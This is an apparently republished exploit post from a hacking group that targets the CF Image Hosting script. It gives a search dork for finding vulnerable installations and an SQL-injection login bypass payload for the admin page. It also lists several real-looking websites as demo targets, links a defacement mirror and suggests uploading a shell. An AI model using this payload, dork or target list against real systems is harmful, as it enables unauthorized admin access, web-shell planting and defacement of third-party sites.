facebook facebook twitter rss

Image Hosting script admin page bypass vulnerability / upload

Author: Rednofozi , Published: 27-09-2018
 ,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
====================================================================================
# Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell
# Exploit Author: Rednofozi
# Date:26-09-2018
# Email: Rednofozi@yahoo.com
# Vendor Homepage: www.codefuture.co.uk
# OUR SITE : https://anonysec.org
|====================================================================================
# {INFO}
# admin bypass Vulnerability
|====================================================================================
# {DORK}
# intext:"Powered By CF Image Hosting script
|====================================================================================
# {POC}
# admin page:
# site.com/admin
# exploit:
# Username: '=''or'
# password: '=''or'
#
# zone-h test hacked http://www.zone-h.org/mirror/id/31702111
|====================================================================================
# {DEMO}
# 01: http://www.irtci.ir/pic/admin.php
# 02: hhttp://image4web.net/admin/
# 03: https://admin.serconi.es/admin
# 04: and upload shell
# 05:
# 06:
# 07:
# 08:
# 09:
# 10:
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck :D:D:D

Like us on Facebook :